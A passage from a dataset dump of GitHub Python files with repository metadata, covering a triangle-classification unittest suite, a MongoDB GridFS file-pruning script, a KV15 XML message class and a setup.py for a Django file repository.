\"MIT\"\n]"},"license_type":{"kind":"string","value":"permissive"},"repo_name":{"kind":"string","value":"rflynn/radixtree"},"repo_url":{"kind":"string","value":"https://github.com/rflynn/radixtree"},"snapshot_id":{"kind":"string","value":"f61a4c74a7c7ba9704e5d539361b177b18d12273"},"revision_id":{"kind":"string","value":"398b71157e83e994c59fa88bcabfd8ebcac52017"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-05T19:28:17.076752","string":"2016-09-05T19:28:17.076752"},"revision_date":{"kind":"timestamp","value":"2014-03-08T22:32:18","string":"2014-03-08T22:32:18"},"committer_date":{"kind":"timestamp","value":"2014-03-08T22:32:18","string":"2014-03-08T22:32:18"},"github_id":{"kind":"number","value":3547109,"string":"3,547,109"},"star_events_count":{"kind":"number","value":1,"string":"1"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"# ex: set ts=4 et:\n\nfrom radixtree import RadixTree, URLTree\n\nRadixTree.test()\nURLTree.test()\n\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1195,"cells":{"__id__":{"kind":"number","value":13099650268405,"string":"13,099,650,268,405"},"blob_id":{"kind":"string","value":"bc115d46c27758e706498234519b250073c8c303"},"directory_id":{"kind":"string","value":"65ac1849fad78cc8effe46bf3aa6df0a8fb39058"},"path":{"kind":"string","value":"/triangle/test.py"},"content_id":{"kind":"string","value":"22dbd69a2be2264f9290439b7232db26c3e29638"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"thylm55/ktpm2013"},"repo_url":{"kind":"string","value":"https://github.com/thylm55/ktpm2013"},"snapshot_id":{"kind":"string","value":"97d827ffcadc1acb770dba4e14caf5e5e76785ce"},"revision_id":{"kind":"string","value":"f7ea72368c4e8c2bd30681dff71766987ee75d1c"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-06T11:04:47.768403","string":"2016-09-06T11:04:47.768403"},"revision_date":{"kind":"timestamp","value":"2013-10-19T17:30:06","string":"2013-10-19T17:30:06"},"committer_date":{"kind":"timestamp","value":"2013-10-19T17:30:06","string":"2013-10-19T17:30:06"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"OUTPUT01 = 'equilateral triangle'\nOUTPUT02 = 'isosceles right triangle'\nOUTPUT03 = 'right triangle'\nOUTPUT04 = 'isosceles triangle'\nOUTPUT05 = 'triangle'\nOUTPUT06 = 'not identified'\n\nimport unittest\nimport math\n\nfrom triangle import detect_triangle\n\nclass TriangleTest(unittest.TestCase):\n # classification test cases\n\n # equilateral triangle\n def test01a(self):\n result = detect_triangle(3, 3, 3)\n self.assertEqual(result, OUTPUT01)\n \n def test01b(self):\n result = detect_triangle(2**32-1, 2**32-1, 2**32-1)\n self.assertEqual(result, OUTPUT01)\n\n def test01c(self):\n result = detect_triangle(1e-30, 1e-30, 1e-30)\n self.assertEqual(result, OUTPUT01)\n\n # isosceles right triangle\n def test02a(self):\n result = detect_triangle(2, 2, math.sqrt(8))\n self.assertEqual(result, OUTPUT02)\n \n def test02b(self):\n result = detect_triangle(3, 3, math.sqrt(18))\n self.assertEqual(result, OUTPUT02)\n\n def test02c(self):\n result = detect_triangle(4, 4, math.sqrt(32))\n self.assertEqual(result, OUTPUT02)\n\n def test02d(self):\n result = detect_triangle(7, 7, math.sqrt(98))\n self.assertEqual(result, OUTPUT02)\n\n # right triangle\n def test03a(self):\n result = detect_triangle(3, 4, 5)\n self.assertEqual(result, OUTPUT03)\n\n def test03b(self):\n result = detect_triangle(6, 5, math.sqrt(61))\n self.assertEqual(result, OUTPUT03)\n\n # isosceles triangle\n def test04a(self):\n result = detect_triangle(7, 7, 5)\n self.assertEqual(result, OUTPUT04)\n\n def test04b(self):\n result = detect_triangle(2**32-1, 2**32-1, 4)\n self.assertEqual(result, OUTPUT04)\n\n def test04c(self):\n result = detect_triangle(2**32-1, 2**32-1, 2**32-2)\n self.assertEqual(result, OUTPUT04)\n\n def test04d(self):\n result = detect_triangle(2**32-1, 4, 2**32-1)\n self.assertEqual(result, OUTPUT04)\n\n def test04d(self):\n result = detect_triangle(2**32-1, 4, 2**32-1)\n self.assertEqual(result, OUTPUT04)\n\n # triangle\n def test05a(self):\n result = detect_triangle(2, 3, 4)\n self.assertEqual(result, OUTPUT05)\n\n def test05b(self):\n result = detect_triangle(2**32-1, 2**32-2, 2**32-3)\n self.assertEqual(result, OUTPUT05)\n\n def test05c(self):\n result = detect_triangle(2**32-1, 2**32-2, 3)\n self.assertEqual(result, OUTPUT05) \n\n def test06a(self):\n result = detect_triangle(1, 2, 3)\n self.assertEqual(result, OUTPUT06)\n\n # input test cases\n def test07a(self):\n result = detect_triangle(-2, 3, 4)\n self.assertEqual(result, OUTPUT06)\n\n def test07b(self):\n result = detect_triangle(2, -3, 4)\n self.assertEqual(result, OUTPUT06)\n\n def test07c(self):\n result = detect_triangle(2, 3, -4)\n self.assertEqual(result, OUTPUT06)\n\n def test08a(self):\n result = detect_triangle(\"a\", 3, 4)\n self.assertEqual(result, OUTPUT06)\n\n def test08b(self):\n result = detect_triangle(2, \"math.sqrt(2)\", 4)\n self.assertEqual(result, OUTPUT06)\n\n def test08c(self):\n result = detect_triangle(2, 3, \"2**32-1\")\n self.assertEqual(result, OUTPUT06)\n\n def test09a(self):\n result = detect_triangle()\n self.assertEqual(result, OUTPUT06)\n\n def test09b(self):\n result = detect_triangle(2)\n self.assertEqual(result, OUTPUT06)\n\n def test09c(self):\n result = detect_triangle(2, 3)\n self.assertEqual(result, OUTPUT06)\n\n def test10a(self):\n result = detect_triangle(0, 0, 0)\n self.assertEqual(result, OUTPUT06)\n\n def test10b(self):\n result = detect_triangle(0, 3, 4)\n self.assertEqual(result, OUTPUT06)\n\n def test10c(self):\n result = detect_triangle(2, 0, 4)\n self.assertEqual(result, OUTPUT06)\n\n def test10d(self):\n result = detect_triangle(2, 3, 0)\n self.assertEqual(result, OUTPUT06)\n\n# run test\nif __name__ == '__main__':\n unittest.main()\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2013,"string":"2,013"}}},{"rowIdx":1196,"cells":{"__id__":{"kind":"number","value":19670950233002,"string":"19,670,950,233,002"},"blob_id":{"kind":"string","value":"0ce4b762cba8c0ef8a7780daa575967c655eb588"},"directory_id":{"kind":"string","value":"119efda3f0af227958aa9b14e7ea1687453cdf10"},"path":{"kind":"string","value":"/kv15/kv15messages.py"},"content_id":{"kind":"string","value":"04f2c35e035bc97d234b91858f87473f4131d53b"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"sven4all/openebs"},"repo_url":{"kind":"string","value":"https://github.com/sven4all/openebs"},"snapshot_id":{"kind":"string","value":"9c48fec296973df6f70ccd94259d09c629c69558"},"revision_id":{"kind":"string","value":"f0abbda96b83cb71f323aceaec777a95c01d09f8"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-17T21:47:54.863980","string":"2021-01-17T21:47:54.863980"},"revision_date":{"kind":"timestamp","value":"2012-12-10T01:16:41","string":"2012-12-10T01:16:41"},"committer_date":{"kind":"timestamp","value":"2012-12-10T01:16:41","string":"2012-12-10T01:16:41"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"from io.push import Push\n\nclass KV15messages:\n\tdef __init__(self, stopmessages = None):\n\t\tif stopmessages is None:\n\t\t\tself.stopmessages = []\n\t\telse:\n\t\t\tself.stopmessages = stopmessages\n\t\n\tdef __str__(self):\n\t\txml = \"\"\"\t\\n\"\"\"\n\t\tfor stopmessage in self.stopmessages:\n\t\t\txml += str(stopmessage)\n\t\txml += \"\"\"\t\"\"\"\n\n\t\treturn xml\n\t\n\tdef push(self, remote, path):\n\t\treturn Push(dossiername='KV15messages', content = str(self), namespace='http://bison.connekt.nl/tmi8/kv15/msg').push(remote, path)\n\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2012,"string":"2,012"}}},{"rowIdx":1197,"cells":{"__id__":{"kind":"number","value":15453292358713,"string":"15,453,292,358,713"},"blob_id":{"kind":"string","value":"fe0087481c31804abcdacecfb9846e35607f1760"},"directory_id":{"kind":"string","value":"3967090c44cba1a77dd573ac1b16566ccbdfc5d7"},"path":{"kind":"string","value":"/utilities/prunefiles.py"},"content_id":{"kind":"string","value":"09cdd6ac92c66e41827f2c946bbfd73fac6c4dcc"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"cgperschon/slickqa"},"repo_url":{"kind":"string","value":"https://github.com/cgperschon/slickqa"},"snapshot_id":{"kind":"string","value":"c0e79656b4352140b4ef6a31bc32415a4352b94f"},"revision_id":{"kind":"string","value":"6eae7361da4a95ab22377edf9d1349295d248982"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-01T17:15:56.475399","string":"2021-01-01T17:15:56.475399"},"revision_date":{"kind":"timestamp","value":"2014-02-05T19:49:34","string":"2014-02-05T19:49:34"},"committer_date":{"kind":"timestamp","value":"2014-02-05T19:49:34","string":"2014-02-05T19:49:34"},"github_id":{"kind":"number","value":35633779,"string":"35,633,779"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"#!/usr/bin/env python\n__author__ = 'jcorbett'\n\nimport argparse\nimport pymongo\nimport sys\n\nfrom gridfs import GridFS\n\ndef main(arguments):\n parser = argparse.ArgumentParser(description='Remove files from a set of results.')\n parser.add_argument(\"-p\", \"--project\", dest=\"project\", required=True, help=\"The project to prune files from\")\n parser.add_argument(\"-r\", \"--release\", dest=\"release\", required=True, help=\"The release of the project to prune files from.\")\n options = parser.parse_args(args=arguments)\n\n connection = pymongo.Connection()\n db = connection['slickij']\n gridfs = GridFS(db)\n project = db.projects.find_one({'name': options.project})\n if project is None:\n print \"There is no project with the name\", options.project\n sys.exit(1)\n release = None\n for possible in project['releases']:\n if possible['name'] == options.release:\n release = possible\n break\n else:\n print \"There is no release with the name\", options.release\n sys.exit(1)\n\n number_of_results = db.results.find({'release.releaseId': release['id']}).count()\n print \"There are\", number_of_results, \"results in that release.\"\n resultnum = 0\n for result in db.results.find({'release.releaseId': release['id']}):\n sys.stdout.write(\"{:.2f}%\\r\".format(((float(resultnum) / number_of_results) * 100)))\n sys.stdout.flush()\n resultnum += 1\n if 'files' in result:\n for fileref in result['files']:\n fileobj = db[fileref.collection].find_one(fileref.id)\n gridfs.delete(fileref.id)\n print \"Done Removing files from\", number_of_results, \"results.\"\n print \"Removing file references from the results.\"\n db.results.update({'release.releaseId': release['id']}, {\"$unset\": {\"\": 1}}, False, True)\n print \"Done.\"\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1198,"cells":{"__id__":{"kind":"number","value":2508260911506,"string":"2,508,260,911,506"},"blob_id":{"kind":"string","value":"287eb9f81d624c2e7ffeda1e3c23fb9211060a00"},"directory_id":{"kind":"string","value":"2c3340c0c9c3effc22ce181506a7c76718485510"},"path":{"kind":"string","value":"/src/toolkit/monitoring/hippo/index.py"},"content_id":{"kind":"string","value":"002cfc9a47531bec73892343581bda4ad88bdbbe"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"samtaufa/nomoa.bsd"},"repo_url":{"kind":"string","value":"https://github.com/samtaufa/nomoa.bsd"},"snapshot_id":{"kind":"string","value":"3db5b336c34c8e24f94601129ab4f9682adbbac3"},"revision_id":{"kind":"string","value":"592e158be1d8a078625c56bce973449c61fd6451"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-25T07:34:35.637146","string":"2021-01-25T07:34:35.637146"},"revision_date":{"kind":"timestamp","value":"2011-10-16T10:28:03","string":"2011-10-16T10:28:03"},"committer_date":{"kind":"timestamp","value":"2011-10-16T10:28:03","string":"2011-10-16T10:28:03"},"github_id":{"kind":"number","value":688565,"string":"688,565"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"from countershape.doc import *\nimport countershape\n\nthis.layout = ns.tpl_layout\n\nthis.titlePrefix = ns.titlePrefix + \"[Configuration] \"\n\npages = [\n \n Page(\"install.md\",\n title=\"Install\",\n pageTitle=\"Simple Message System\"),\n]\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2011,"string":"2,011"}}},{"rowIdx":1199,"cells":{"__id__":{"kind":"number","value":4939212441144,"string":"4,939,212,441,144"},"blob_id":{"kind":"string","value":"fcbccc63e45b83c0b89e304ffe25d23be6189e65"},"directory_id":{"kind":"string","value":"fefc919f8a7f348589fdccca864545656844d449"},"path":{"kind":"string","value":"/src/djangofr/repository/setup.py"},"content_id":{"kind":"string","value":"77eb652d3bc491932a764b9453a9f63de426bbfa"},"detected_licenses":{"kind":"list like","value":["GPL-3.0-only"],"string":"[\n \"GPL-3.0-only\"\n]"},"license_type":{"kind":"string","value":"non_permissive"},"repo_name":{"kind":"string","value":"akaak/django-file-repository"},"repo_url":{"kind":"string","value":"https://github.com/akaak/django-file-repository"},"snapshot_id":{"kind":"string","value":"c691a16370ef49a5b0d955b7d7a7c4d117366db1"},"revision_id":{"kind":"string","value":"44dabaf9483be1b8fa028f82679333f9437ac3f5"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-21T03:46:11.745046","string":"2021-01-21T03:46:11.745046"},"revision_date":{"kind":"timestamp","value":"2014-03-23T01:51:31","string":"2014-03-23T01:51:31"},"committer_date":{"kind":"timestamp","value":"2014-03-23T01:51:31","string":"2014-03-23T01:51:31"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"import os\nfrom setuptools import setup\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name = \"django-file-repository\",\n version = \"0.2b\",\n author = \"Oscar Carballal Prego\",\n author_email = \"oscar.carballal@cidadania.coop\",\n description = (\"Simple file repository with public/private files, tags and categories.\"),\n license = \"GPLv3\",\n keywords = \"repository tagging categorization file\",\n url = \"http://github.com/cidadania/django-file-repository\",\n packages=['repository'],\n long_description=read('README'),\n classifiers=[\n \"Development Status :: 4 - Beta/Testing\",\n \"Topic :: Web Utilities\",\n \"Framework :: Django 1.4.5\",\n \"License :: OSI Approved :: GPLv3 License\",\n \"Operating System :: OS Independent\",\n \"Natural Language :: English\",\n \"Natural Language :: Spanish\",\n \"Dependencies :: django-registration, django-taggit\",\n \"Intended Audience :: Everyone\",\n ],\n)\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}}],"truncated":false,"partial":false},"paginationData":{"pageIndex":11,"numItemsPerPage":100,"numTotalItems":42509,"offset":1100,"length":100}},"jwt":"eyJhbGciOiJFZERTQSJ9.eyJyZWFkIjp0cnVlLCJwZXJtaXNzaW9ucyI6eyJyZXBvLmNvbnRlbnQucmVhZCI6dHJ1ZX0sImlhdCI6MTc1NjI2ODk1NCwic3ViIjoiL2RhdGFzZXRzL2xvdWJuYWJubC9vbGRfcHl0aG9uIiwiZXhwIjoxNzU2MjcyNTU0LCJpc3MiOiJodHRwczovL2h1Z2dpbmdmYWNlLmNvIn0.gGSKmzhIzBiVJB4BcsrpUgT9nUHDvXXwgkal0uWZonu0Q8uTghoqp5hpjmE_J5cAmqW2iIOIsE0NQC_FTuoZCg","displayUrls":true},"discussionsStats":{"closed":0,"open":1,"total":1},"fullWidth":true,"hasGatedAccess":true,"hasFullAccess":true,"isEmbedded":false,"savedQueries":{"community":[],"user":[]}}">
import Addition as Add
import Subtraction as Sub
import Multiplication as Mul
import Division as Div
if __name__ == "__main__":
cont = True
while cont:
print("Welcome in this Learning software ! What do you want to do ?")
type = input("A for Addition, S for Subtraction, M for Multiplication and D for Division").lower()
if type == "a":
a= Add.Addition(3)
print(a)
elif type == "s":
b= Sub.Subtraction(3)
print(b)
elif type == "m":
c= Mul.Multiplication(3)
print(c)
elif type == "d":
d= Div.Division(3)
print(d)
else: print("Please write a good letter !")
if type == "a":
answer = input("What's the answer ?")
print(a.answer(int(answer)))
elif type == "s":
answer = input("What's the answer ?")
print(b.answer(int(answer)))
elif type == "m":
answer = input("What's the answer ?")
print(c.answer(int(answer)))
elif type == "d":
answer = input("What's the answer ?")
print(d.answer(int(answer)))
else: print("Please write a good letter !")
stop = input("Would you like to stop or continue ? S to stop and C to continue").lower()
if stop == "s":
cont = False
else :
cont = True
#!/usr/bin/env python
'''
tweetyourRSS is a simple python script that enables you to publish any RSS feed
on twitter
'''
import sys
import tweepy
import pickle
from bitly import Bitly
from twitter import Twitter
from feeds import Feeds
from settings import *
__author__ = "Alberto Buratti, Mattia Larentis"
__credits__ = ["Alberto Buratti", "Mattia Larentis", "Federico Scrinzi"]
__license__ = "WTFPL"
__maintainer__ = "Alberto Buratti"
__email__ = "[email protected]"
def main():
'''
app entry point
'''
# gets a twitter object
tw = Twitter(TWITTER['CONSUMER_KEY'], TWITTER['CONSUMER_SECRET'], \
TWITTER['ACCESS_TOKEN'], TWITTER['ACCESS_TOKEN_SECRET'])
# gets a bitly object
bl = Bitly(BITLY['USER'], BITLY['APIKEY'])
# tries to load the history from the file. If an exception is raised,
# istantiates an empty dictionary object
try:
with open(HISTORY_FILE, 'rb') as history_file:
history = pickle.load(history_file)
except:
history = dict()
# cycles through the RSSs defined in settings
for rsskey, rssvalue in RSS.iteritems():
# gets a feed object
fd = Feeds(rssvalue['RSS'])
# tries to load last timestamp. If an exception is raised,
# initializes it with the init value defined in settings
try:
last_timestamp = history[rsskey]
except:
last_timestamp = (rssvalue['HISTORY'])['INIT_VALUE']
history[rsskey] = last_timestamp
# gets the updated feeds
entries = fd.get_updated_feeds(rssvalue['HISTORY'], last_timestamp)
# cycles through the feeds, tweetin them
for feed in entries:
link = bl.shorten_url(getattr(feed, rssvalue['LINK']))
tweet = getattr(feed, rssvalue['TEXT'])
length = TWITTER['TWEET_LENGTH'] - len(rssvalue['HASHTAG']) \
- len(link) - 10
tweet = rssvalue['HASHTAG'] + ' ' + tw.truncate(tweet, length) \
+ ' ' + link
tw.update_status(tweet, DEBUG)
# updates the last timestamp
history[rsskey] = fd.get_last_timestamp()
# saves the history
with open(HISTORY_FILE, 'wb') as history_file:
pickle.dump(history, history_file)
sys.exit(0)
if __name__ == "__main__":
main()
"""
* Copyright 2007,2008,2009 John C. Gunther
* Copyright (C) 2009 Luke Kenneth Casson Leighton <[email protected]>
*
* Licensed under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* http:#www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific
* language governing permissions and limitations under the
* License.
*
"""
import math
from pyjamas.ui import HasHorizontalAlignment
from pyjamas.ui import HasVerticalAlignment
# Validates multipliers used to simplify computing the
# upper left corner location of symbols and labels to
# properly reflect their alignment relative to the
# plotted point or labeled symbol.
def validateMultipliers(widthMultiplier, heightMultiplier):
if (not (widthMultiplier == 0 or abs(widthMultiplier)==1) and
not (heightMultiplier == 0 or abs(heightMultiplier)==1)):
raise IllegalArgumentException(
"widthMultiplier, heightMultiplier args must both be " +
"either 0, 1, or -1")
# retrieves a location given its multipliers
def getAnnotationLocation(widthMultiplier, heightMultiplier):
locationMap = [
[NORTHWEST, NORTH, NORTHEAST],
[WEST, CENTER, EAST],
[SOUTHWEST, SOUTH, SOUTHEAST]]
# assumes both multiplier are -1, 0, or 1
result = locationMap[heightMultiplier+1][widthMultiplier+1]
return result
# Negative width or height "turn the symbol inside-out",
# requiring a corresponding "reflection" of annotation
# location (only needed for baseline-based bar symbols)
def transform(a, signWidth, signHeight):
result = a
if signWidth < 0 or signHeight < 0:
result = getAnnotationLocation(
signWidth*a.widthMultiplier,
signHeight*a.heightMultiplier)
return result
"""*
** Defines the location of a data point's annotation or hover
** annotation (which can be defined by either plain text, HTML,
** or a widget) relative to the location of that point's
** symbol. The "Field Summary"
** section below lists all available annotation locations.
** <p>
**
** The default annotation location is {@link
** AnnotationLocation#SOUTH SOUTH} for annotations and
** is symbol-type-dependent for hover annotations. See the
** <tt>setHoverLocation</tt> method for list of these defaults.
**
** <p>
**
** You can further adjust the position of a point's
** annotation (or hover annotation) by specifying non-zero
** positional shifts via the <tt>setAnnotationXShift</tt>
** and <tt>setAnnotationYShift</tt> (or via the
** <tt>setHoverXShift</tt>, <tt>setHoverYShift</tt>),
** and <tt>setHoverAnnotationSymbolType</tt> methods for
** hover annotations).
** <p>
**
** @see Curve.Point#setAnnotationLocation Point.setAnnotationLocation
** @see Curve.Point#setAnnotationXShift Point.setAnnotationXShift
** @see Curve.Point#setAnnotationYShift Point.setAnnotationYShift
** @see Symbol#setHoverLocation Symbol.setHoverLocation
** @see Symbol#setHoverAnnotationSymbolType
** Symbol.setHoverAnnotationSymbolType
** @see Symbol#setHoverXShift Symbol.setHoverXShift
** @see Symbol#setHoverYShift Symbol.setHoverYShift
** @see #DEFAULT_HOVER_LOCATION DEFAULT_HOVER_LOCATION
**
*"""
class AnnotationLocation:
# these multiply the width and height of the annotation and
# the symbol it is attached to in order to define the
# center of the annotation (see equations in later code),
# and thus the upper left corner anchoring point.
def __init__(self, widthMultiplier, heightMultiplier):
validateMultipliers(widthMultiplier, heightMultiplier)
self.widthMultiplier = widthMultiplier
self.heightMultiplier = heightMultiplier
# These define the alignment of the label within it's
# containing 1 x 1 Grid. For example, if this
# containing grid is to the left of the labeled
# symbol (widthMultiplier==-1) the horizontal
# alignment will be ALIGN_RIGHT, so as to bring the
# contained label flush against the left edge of the
# labeled symbol.
def getHorizontalAlignment(self):
if self.widthMultiplier == -1:
result = HasHorizontalAlignment.ALIGN_RIGHT
elif self.widthMultiplier == 0:
result = HasHorizontalAlignment.ALIGN_CENTER
elif self.widthMultiplier == 1:
result = HasHorizontalAlignment.ALIGN_LEFT
else:
raise IllegalStateException(
"Invalid widthMultiplier: " + str(self.widthMultiplier) +
" 1, 0, or -1 were expected.")
return result
""" Given the x-coordinate at the center of the symbol
* that this annotation annotates, the annotation's
* width, and the symbol's width, this method returns
* the x-coordinate of the upper left corner of
* this annotation.
"""
def getUpperLeftX(self, x, w, symbolW):
result = int (round(x +
(self.widthMultiplier * (w + symbolW) - w)/2.) )
return result
""" analogous to getUpperLeftX, except for the y-coordinate """
def getUpperLeftY(self, y, h, symbolH):
result = int (round(y +
(self.heightMultiplier * (h + symbolH) - h)/2.))
return result
# analogous to getHorizontalAlignment
def getVerticalAlignment(self):
if self.heightMultiplier == -1:
result = HasVerticalAlignment.ALIGN_BOTTOM
elif self.heightMultiplier == 0:
result = HasVerticalAlignment.ALIGN_MIDDLE
elif self.heightMultiplier == 1:
result = HasVerticalAlignment.ALIGN_TOP
else:
raise IllegalStateException(
"Invalid heightMultiplier: " + self.heightMultiplier +
" -1, 0, or 1 were expected.")
return result
"""
* This method returns the annotation location whose
* "attachment point" keeps the annotation either
* completely outside, centered on, or completely inside
* (depending on if the heightMultiplier of this annotation
* is 1, 0, or -1) the point on the pie's circumference
* associated with the given angle.
* <p>
*
* The use of heightMultiplier rather than widthMultiplier
* is somewhat arbitrary, but was chosen so that the
* NORTH, CENTER, and SOUTH annotation locations have the
* same interpretation for a pie slice whose bisecting
* radius points due south (due south is the default initial
* pie slice orientation) and for a 1px x 1px BOX_CENTER
* type symbol positioned at the due south position on the
* pie's circumference. As the pie-slice-arc-bisection
* point moves clockwise around the pie perimeter, the
* attachment point (except for vertically-centered
* annotations, which remain centered on the pie arc) also
* moves clockwise, but in discrete jumps (e.g. from
* NORTH, to NORTHEAST, to EAST, to SOUTHEAST, to SOUTH,
* etc. for annotations inside the pie) so the annotation
* remains appropriately attached to the center of the
* slice's arc as the angle changes.
*
"""
def decodePieLocation(self, thetaMid):
# a sin or cos that is small enough so that the
# associated angle is horizontal (for sines) or vertical
# (for cosines) enough to warrant use of a "centered"
# annotation location.
LOOKS_VERTICAL_OR_HORIZONTAL_DELTA = 0.1
sinTheta = math.sin(thetaMid)
cosTheta = math.cos(thetaMid)
if cosTheta < -LOOKS_VERTICAL_OR_HORIZONTAL_DELTA:
pieTransformedWidthMultiplier = -self.heightMultiplier
elif cosTheta > LOOKS_VERTICAL_OR_HORIZONTAL_DELTA:
pieTransformedWidthMultiplier = self.heightMultiplier
else:
pieTransformedWidthMultiplier = 0
# XXX ?? surely this should be widthMultiplier?
if sinTheta < -LOOKS_VERTICAL_OR_HORIZONTAL_DELTA:
pieTransformedHeightMultiplier = -self.heightMultiplier
elif sinTheta > LOOKS_VERTICAL_OR_HORIZONTAL_DELTA:
pieTransformedHeightMultiplier = self.heightMultiplier
else:
pieTransformedHeightMultiplier = 0
return getAnnotationLocation(pieTransformedWidthMultiplier,
pieTransformedHeightMultiplier)
# end of class AnnotationLocation
# non-tagging-only locations used by ANCHOR_MOUSE_* symbol types
AT_THE_MOUSE = AnnotationLocation(0,0)
AT_THE_MOUSE_SNAP_TO_X = AnnotationLocation(0,0)
